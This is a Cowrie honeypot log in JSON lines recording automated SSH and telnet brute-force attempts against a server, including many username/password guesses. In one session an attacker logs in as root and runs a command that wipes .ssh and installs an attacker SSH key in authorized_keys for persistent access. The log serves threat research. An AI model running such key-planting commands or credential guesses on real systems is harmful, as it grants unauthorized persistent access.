{"eventid":"cowrie.session.connect","src_ip":"182.18.161.165","src_port":57852,"dst_ip":"1.2.3.4","dst_port":22,"session":"bff996b63810","protocol":"ssh","message":"New connection: 182.18.161.165:57852 (1.2.3.4:22) [session: bff996b63810]","sensor":"my-vps","timestamp":"2025-09-09T00:00:05.940958Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-09T00:00:05.943196Z","src_ip":"182.18.161.165","session":"bff996b63810"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-09T00:00:06.188238Z","src_ip":"182.18.161.165","session":"bff996b63810"}
{"eventid":"cowrie.login.failed","username":"nfsnobod","password":"12345","message":"login attempt [nfsnobod/12345] failed","sensor":"my-vps","timestamp":"2025-09-09T00:00:07.220344Z","src_ip":"182.18.161.165","session":"bff996b63810"}
{"eventid":"cowrie.session.closed","duration":"2.5","message":"Connection lost after 2.5 seconds","sensor":"my-vps","timestamp":"2025-09-09T00:00:08.468144Z","src_ip":"182.18.161.165","session":"bff996b63810"}
{"eventid":"cowrie.session.connect","src_ip":"45.150.34.92","src_port":46880,"dst_ip":"1.2.3.4","dst_port":22,"session":"972e903704b0","protocol":"ssh","message":"New connection: 45.150.34.92:46880 (1.2.3.4:22) [session: 972e903704b0]","sensor":"my-vps","timestamp":"2025-09-09T00:00:26.723009Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-09T00:00:26.723931Z","src_ip":"45.150.34.92","session":"972e903704b0"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-09T00:00:26.741216Z","src_ip":"45.150.34.92","session":"972e903704b0"}
{"eventid":"cowrie.login.failed","username":"audit","password":"Welcome1","message":"login attempt [audit/Welcome1] failed","sensor":"my-vps","timestamp":"2025-09-09T00:00:26.851532Z","src_ip":"45.150.34.92","session":"972e903704b0"}
{"eventid":"cowrie.session.closed","duration":"1.1","message":"Connection lost after 1.1 seconds","sensor":"my-vps","timestamp":"2025-09-09T00:00:27.871243Z","src_ip":"45.150.34.92","session":"972e903704b0"}
{"eventid":"cowrie.session.connect","src_ip":"93.113.63.124","src_port":55872,"dst_ip":"1.2.3.4","dst_port":22,"session":"49454d4cfa16","protocol":"ssh","message":"New connection: 93.113.63.124:55872 (1.2.3.4:22) [session: 49454d4cfa16]","sensor":"my-vps","timestamp":"2025-09-09T00:00:30.157140Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-09T00:00:30.157852Z","src_ip":"93.113.63.124","session":"49454d4cfa16"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-09T00:00:30.216907Z","src_ip":"93.113.63.124","session":"49454d4cfa16"}
{"eventid":"cowrie.login.success","username":"root","password":"Aa@123123","message":"login attempt [root/Aa@123123] succeeded","sensor":"my-vps","timestamp":"2025-09-09T00:00:30.512535Z","src_ip":"93.113.63.124","session":"49454d4cfa16"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T00:00:30.730902Z","src_ip":"93.113.63.124","session":"49454d4cfa16"}
{"eventid":"cowrie.command.input","input":"cd ~; chattr -ia .ssh; lockr -ia .ssh","message":"CMD: cd ~; chattr -ia .ssh; lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-09-09T00:00:30.731696Z","src_ip":"93.113.63.124","session":"49454d4cfa16"}
{"eventid":"cowrie.command.failed","input":"lockr -ia .ssh","message":"Command not found: lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-09-09T00:00:30.732853Z","src_ip":"93.113.63.124","session":"49454d4cfa16"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","size":32,"shasum":"c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","duplicate":true,"duration":"0.1","message":"Closing TTY Log: var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644 after 0.1 seconds","sensor":"my-vps","timestamp":"2025-09-09T00:00:30.792923Z","src_ip":"93.113.63.124","session":"49454d4cfa16"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T00:00:31.068606Z","src_ip":"93.113.63.124","session":"49454d4cfa16"}
{"eventid":"cowrie.command.input","input":"cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","message":"CMD: cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","sensor":"my-vps","timestamp":"2025-09-09T00:00:31.069369Z","src_ip":"93.113.63.124","session":"49454d4cfa16"}
{"eventid":"cowrie.session.file_download","duplicate":true,"outfile":"var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","shasum":"a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","destfile":"/root/.ssh/authorized_keys","message":"Saved redir contents with SHA-256 a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2 to var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","sensor":"my-vps","timestamp":"2025-09-09T00:00:31.129945Z","src_ip":"93.113.63.124","session":"49454d4cfa16"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","size":0,"shasum":"cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","duplicate":true,"duration":"0.1","message":"Closing TTY Log: var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f after 0.1 seconds","sensor":"my-vps","timestamp":"2025-09-09T00:00:31.130859Z","src_ip":"93.113.63.124","session":"49454d4cfa16"}
{"eventid":"cowrie.session.connect","src_ip":"93.113.63.124","src_port":55882,"dst_ip":"1.2.3.4","dst_port":22,"session":"a62a5c72fb3f","protocol":"ssh","message":"New connection: 93.113.63.124:55882 (1.2.3.4:22) [session: a62a5c72fb3f]","sensor":"my-vps","timestamp":"2025-09-09T00:00:31.212027Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-09T00:00:31.212934Z","src_ip":"93.113.63.124","session":"a62a5c72fb3f"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-09T00:00:31.284793Z","src_ip":"93.113.63.124","session":"a62a5c72fb3f"}
{"eventid":"cowrie.login.failed","username":"345gs5662d34","password":"345gs5662d34","message":"login attempt [345gs5662d34/345gs5662d34] failed","sensor":"my-vps","timestamp":"2025-09-09T00:00:31.672096Z","src_ip":"93.113.63.124","session":"a62a5c72fb3f"}
{"eventid":"cowrie.session.closed","duration":"1.5","message":"Connection lost after 1.5 seconds","sensor":"my-vps","timestamp":"2025-09-09T00:00:32.746376Z","src_ip":"93.113.63.124","session":"a62a5c72fb3f"}
{"eventid":"cowrie.session.connect","src_ip":"93.113.63.124","src_port":55884,"dst_ip":"1.2.3.4","dst_port":22,"session":"85950c759900","protocol":"ssh","message":"New connection: 93.113.63.124:55884 (1.2.3.4:22) [session: 85950c759900]","sensor":"my-vps","timestamp":"2025-09-09T00:00:32.816893Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-09T00:00:32.817692Z","src_ip":"93.113.63.124","session":"85950c759900"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-09T00:00:32.889759Z","src_ip":"93.113.63.124","session":"85950c759900"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":34856,"dst_ip":"1.2.3.4","dst_port":23,"session":"ce12185bc4e1","protocol":"telnet","message":"New connection: 212.227.125.160:34856 (1.2.3.4:23) [session: ce12185bc4e1]","sensor":"my-vps","timestamp":"2025-09-09T00:00:33.100528Z"}
{"eventid":"cowrie.login.success","username":"root","password":"3245gs5662d34","message":"login attempt [root/3245gs5662d34] succeeded","sensor":"my-vps","timestamp":"2025-09-09T00:00:33.352475Z","src_ip":"93.113.63.124","session":"85950c759900"}
{"eventid":"cowrie.session.closed","duration":"3.3","message":"Connection lost after 3.3 seconds","sensor":"my-vps","timestamp":"2025-09-09T00:00:33.460418Z","src_ip":"93.113.63.124","session":"49454d4cfa16"}
{"eventid":"cowrie.session.closed","duration":"0.7","message":"Connection lost after 0.7 seconds","sensor":"my-vps","timestamp":"2025-09-09T00:00:33.471276Z","src_ip":"93.113.63.124","session":"85950c759900"}
{"eventid":"cowrie.session.connect","src_ip":"46.101.8.63","src_port":55552,"dst_ip":"1.2.3.4","dst_port":22,"session":"e290cc5de169","protocol":"ssh","message":"New connection: 46.101.8.63:55552 (1.2.3.4:22) [session: e290cc5de169]","sensor":"my-vps","timestamp":"2025-09-09T00:00:39.605894Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-09T00:00:39.606647Z","src_ip":"46.101.8.63","session":"e290cc5de169"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-09T00:00:39.628237Z","src_ip":"46.101.8.63","session":"e290cc5de169"}
{"eventid":"cowrie.login.failed","username":"oracle","password":"1","message":"login attempt [oracle/1] failed","sensor":"my-vps","timestamp":"2025-09-09T00:00:39.755287Z","src_ip":"46.101.8.63","session":"e290cc5de169"}
{"eventid":"cowrie.session.closed","duration":"1.2","message":"Connection lost after 1.2 seconds","sensor":"my-vps","timestamp":"2025-09-09T00:00:40.779927Z","src_ip":"46.101.8.63","session":"e290cc5de169"}
{"eventid":"cowrie.session.closed","duration":12.532993793487549,"message":"Connection lost after 12 seconds","sensor":"my-vps","timestamp":"2025-09-09T00:00:45.633447Z","src_ip":"212.227.125.160","session":"ce12185bc4e1"}
{"eventid":"cowrie.session.connect","src_ip":"182.18.161.165","src_port":35222,"dst_ip":"1.2.3.4","dst_port":22,"session":"31b09709de96","protocol":"ssh","message":"New connection: 182.18.161.165:35222 (1.2.3.4:22) [session: 31b09709de96]","sensor":"my-vps","timestamp":"2025-09-09T00:01:24.720378Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-09T00:01:24.721351Z","src_ip":"182.18.161.165","session":"31b09709de96"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-09T00:01:24.967310Z","src_ip":"182.18.161.165","session":"31b09709de96"}
{"eventid":"cowrie.login.failed","username":"ibrahim","password":"Welcome1","message":"login attempt [ibrahim/Welcome1] failed","sensor":"my-vps","timestamp":"2025-09-09T00:01:25.994277Z","src_ip":"182.18.161.165","session":"31b09709de96"}
{"eventid":"cowrie.session.closed","duration":"2.5","message":"Connection lost after 2.5 seconds","sensor":"my-vps","timestamp":"2025-09-09T00:01:27.243403Z","src_ip":"182.18.161.165","session":"31b09709de96"}
{"eventid":"cowrie.session.connect","src_ip":"45.150.34.92","src_port":36908,"dst_ip":"1.2.3.4","dst_port":22,"session":"871b59aade0d","protocol":"ssh","message":"New connection: 45.150.34.92:36908 (1.2.3.4:22) [session: 871b59aade0d]","sensor":"my-vps","timestamp":"2025-09-09T00:01:39.639100Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-09T00:01:39.640387Z","src_ip":"45.150.34.92","session":"871b59aade0d"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-09T00:01:39.658252Z","src_ip":"45.150.34.92","session":"871b59aade0d"}
{"eventid":"cowrie.login.failed","username":"acer","password":"password123","message":"login attempt [acer/password123] failed","sensor":"my-vps","timestamp":"2025-09-09T00:01:39.767702Z","src_ip":"45.150.34.92","session":"871b59aade0d"}
{"eventid":"cowrie.session.connect","src_ip":"93.113.63.124","src_port":33514,"dst_ip":"1.2.3.4","dst_port":22,"session":"cf88310a9149","protocol":"ssh","message":"New connection: 93.113.63.124:33514 (1.2.3.4:22) [session: cf88310a9149]","sensor":"my-vps","timestamp":"2025-09-09T00:01:40.623260Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-09T00:01:40.623927Z","src_ip":"93.113.63.124","session":"cf88310a9149"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-09T00:01:40.754427Z","src_ip":"93.113.63.124","session":"cf88310a9149"}
